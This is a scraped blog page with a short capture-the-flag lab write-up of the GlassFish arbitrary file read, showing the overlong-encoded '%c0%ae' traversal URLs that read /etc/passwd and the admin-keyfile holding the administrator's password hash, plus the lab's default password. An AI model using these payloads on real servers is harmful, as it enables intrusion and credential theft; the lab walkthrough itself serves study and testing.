当前位置:网站首页>Buuctf [glassfish] arbitrary file reading
Buuctf [glassfish] arbitrary file reading
2022-06-10 13:25:00 【exploitsec】
Vulnerability description
glassfish Is a java Write a cross platform open source application server .
java In language %c0%ae It can be interpreted as \uC0AE, The last escape is ASCCII Character .( spot ). utilize %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ To jump up , Directory traversal is reached 、 The effect of arbitrary file reading .
Loophole recurrence 
visit https://node3.buuoj.cn:26836/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd, Found successfully read /etc/passwd Content 
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/domains/domain1/config/admin-keyfile
glassfish/domains/domain1/config/admin-keyfile It's storage admin Account and password file , Pictured above , We read this file , Get the password hash of the super administrator

The default password for this environment is vulhub_default_password
Direct deployment getshell
边栏推荐
- 学籍管理系统
- How does the API detect security configuration errors?
- 世贸组织MC12重启 议程重点关注全球经济复苏
- RecyclerView多布局写法,“我的”、“个人中心” 页面经典写法演示
- Office technical lecture: punctuation - Chinese - vertical
- Meetup review how Devops & mlops solve the machine learning dilemma in enterprises?
- NanoMQ Newsletter 2022-05|v0.8.0 发布,新增 WebHook 拓展接口和连接认证 API
- Use unique to quickly remove duplicate elements
- Source of concurrent bugs (I) - visibility
- 【抬杠C#】如何实现接口的base调用
猜你喜欢

H. 265 introduction to coding principles

出海企业遇瓶颈 茄子科技(SHAREit Group)有话说

Which EDA design software should Altium Allegro pads choose

Nanomq newsletter 2022-05 | release of V0.8.0, new webhook extension interface and connection authentication API

NanoMQ Newsletter 2022-05|v0.8.0 发布,新增 WebHook 拓展接口和连接认证 API

谷歌提出超强预训练模型CoCa,在ImageNet上微调Top-1准确率达91%!在多个下游任务上SOTA!
![buuctf [PHP]XDebug RCE](/img/e2/bcae10e2051b7e9dce918bf87fdc05.png)
buuctf [PHP]XDebug RCE

client-go gin的简单整合六-list-watch二(关于Rs与Pod以及Deployment的完善)

Sohu employees encounter wage subsidy fraud. What is the difference between black property and gray property and how to trace the source?
![[spark] (task8) pipeline channel establishment in sparkml](/img/9c/69c6d0cb27906eb895cfc7e4f45f96.png)
[spark] (task8) pipeline channel establishment in sparkml
随机推荐
'getcolor (int) 'is deprecated, getcolor is obsolete
超详细的FFmpeg安装及简单使用教程
Sparkstreaming real-time data warehouse question & answer
移动app性能测试有哪些需要进行?性能测试报告如何收费?
Apple邮箱配置QQ邮箱,163邮箱,edu邮箱,gmail邮箱,获取gmail日历
聊聊消息中间件(1),AMQP那些事儿
Qt数据库应用22-文件编码格式识别
常识,神经元数量,小鼠的脑内神经元大约在7000万个、人类约有860亿个
Binary XML file line 96: error inflating class & lt; unknown>
[Netease Yunxin] in depth analysis of the design of "circle group" message system | series of articles on "circle group" technology
让资源在云端和本地自由流动
Ekuiper newsletter 2022-05 protobuf codec support, visual drag and drop writing rules
讓資源在雲端和本地自由流動
谷歌提出超强预训练模型CoCa,在ImageNet上微调Top-1准确率达91%!在多个下游任务上SOTA!
Meetup review how Devops & mlops solve the machine learning dilemma in enterprises?
No spitting
【FLinlk】Flink小坑之kerberos动态认证
【Multisim仿真】差分放大电路2
If I write the for loop again, I will hammer myself
线性动态规划专讲